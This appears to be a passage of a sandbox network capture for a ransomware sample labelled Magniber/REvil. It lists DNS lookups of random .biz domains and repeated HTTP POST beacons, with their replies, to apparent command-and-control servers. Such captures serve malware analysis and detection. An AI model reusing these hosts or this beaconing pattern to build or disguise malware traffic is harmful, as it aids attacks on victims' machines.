Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0854e482869b219a1006c4142371f7eb|191.101.209.39|1719160416|1719160416|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

172.234.222.143

fwiwk.biz

IN A

172.234.222.138
POST

http://fwiwk.biz/ar

alg.exe

Remote address:

172.234.222.143:80

Request

POST /ar HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
POST

http://gytujflc.biz/wfvmjmbppfxvhg

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /wfvmjmbppfxvhg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:37 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/nkjpklwdjn

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /nkjpklwdjn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:37 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/aip

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /aip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/ngxupksupbbo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /ngxupksupbbo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/dnfgyo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /dnfgyo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/gdroexodml

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

208.100.26.245:80

Request

POST /gdroexodml HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://fwiwk.biz/qxlueibwaatcts

alg.exe

Remote address:

172.234.222.143:80

Request

POST /qxlueibwaatcts HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
DNS

qaynky.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://tbjrpv.biz/bhr

alg.exe

Remote address:

34.246.200.160:80

Request

POST /bhr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a3683f9efefe67b150f6373e0e3706db|191.101.209.39|1719160417|1719160417|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://qaynky.biz/vpqhnith

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /vpqhnith HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=22f43f9fc351c2c465ac8042d7482838|191.101.209.39|1719160418|1719160418|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

alg.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

18.208.156.248
POST

http://deoci.biz/ucx

alg.exe

Remote address:

18.208.156.248:80

Request

POST /ucx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=197e9b804410fd5713c2a822d98bd457|191.101.209.39|1719160417|1719160417|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
POST

http://gytujflc.biz/lorsuojsqmiheih

alg.exe

Remote address:

208.100.26.245:80

Request

POST /lorsuojsqmiheih HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:38 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/ublpuneyruv

alg.exe

Remote address:

208.100.26.245:80

Request

POST /ublpuneyruv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:38 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/gtxnr

alg.exe

Remote address:

208.100.26.245:80

Request

POST /gtxnr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:42 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/tqhpnqcnvcaed

alg.exe

Remote address:

208.100.26.245:80

Request

POST /tqhpnqcnvcaed HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:33:42 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/ifoqyoyqxsdqsxdr

alg.exe

Remote address:

208.100.26.245:80

Request

POST /ifoqyoyqxsdqsxdr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/ujplvwgge

alg.exe

Remote address:

208.100.26.245:80

Request

POST /ujplvwgge HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
DNS

qaynky.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://qaynky.biz/trvn

alg.exe

Remote address:

13.251.16.150:80

Request

POST /trvn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c8323856a6b0b2383dc8c25930d15fa6|191.101.209.39|1719160419|1719160419|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bumxkqgxu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/pvrubihkage

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /pvrubihkage HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b15e74beae10827cfc0b4447a4186362|191.101.209.39|1719160418|1719160418|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/pqbqsojpeqqv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /pqbqsojpeqqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2abc1c13feff2a7ed3211a96afc9bd20|191.101.209.39|1719160419|1719160419|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqwjmb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/fqdwocrtv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

35.164.78.200:80

Request

POST /fqdwocrtv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=071fe976364048bea03a829ccbb18cb5|191.101.209.39|1719160419|1719160419|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bumxkqgxu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/wgncekwnjgom

alg.exe

Remote address:

44.221.84.105:80

Request

POST /wgncekwnjgom HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b33cce08e5b6274308112c0169000d2f|191.101.209.39|1719160419|1719160419|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/nlhffdsb

alg.exe

Remote address:

54.244.188.177:80

Request

POST /nlhffdsb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3261bdb83fd1055fb4c605f266be327f|191.101.209.39|1719160420|1719160420|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ytctnunms.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/raglhhxbtyp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.94.10.34:80

Request

POST /raglhhxbtyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f70a669ec3bb506963d6a1e8045881d0|191.101.209.39|1719160419|1719160419|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
POST

http://myups.biz/imapiyt

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

165.160.13.20:80

Request

POST /imapiyt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Date: Sun, 23 Jun 2024 16:33:40 GMT
Content-Length: 94
POST

http://myups.biz/fvdnfhdrgbq

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

165.160.13.20:80

Request

POST /fvdnfhdrgbq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Date: Sun, 23 Jun 2024 16:33:40 GMT
Content-Length: 94
DNS

nqwjmb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/jlncn

alg.exe

Remote address:

35.164.78.200:80

Request

POST /jlncn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d8c86e0674ab4d0ce68d4734964244f5|191.101.209.39|1719160420|1719160420|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

oshhkdluh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

54.244.188.177
DNS

ytctnunms.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://oshhkdluh.biz/mma

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /mma HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9a973ec94e425272734f6968030206ae|191.101.209.39|1719160421|1719160421|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ytctnunms.biz/mma

alg.exe

Remote address:

3.94.10.34:80

Request

POST /mma HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=02559b3c346b0c01ca09288580cc000d|191.101.209.39|1719160420|1719160420|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.15.20

myups.biz

IN A

165.160.13.20
POST

http://myups.biz/dyuuwlucrjbjmes

alg.exe

Remote address:

165.160.15.20:80

Request

POST /dyuuwlucrjbjmes HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Length: 94
POST

http://myups.biz/dqbbxdl

alg.exe

Remote address:

165.160.15.20:80

Request

POST /dqbbxdl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Length: 94
DNS

yunalwv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

jpskm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
DNS

oshhkdluh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

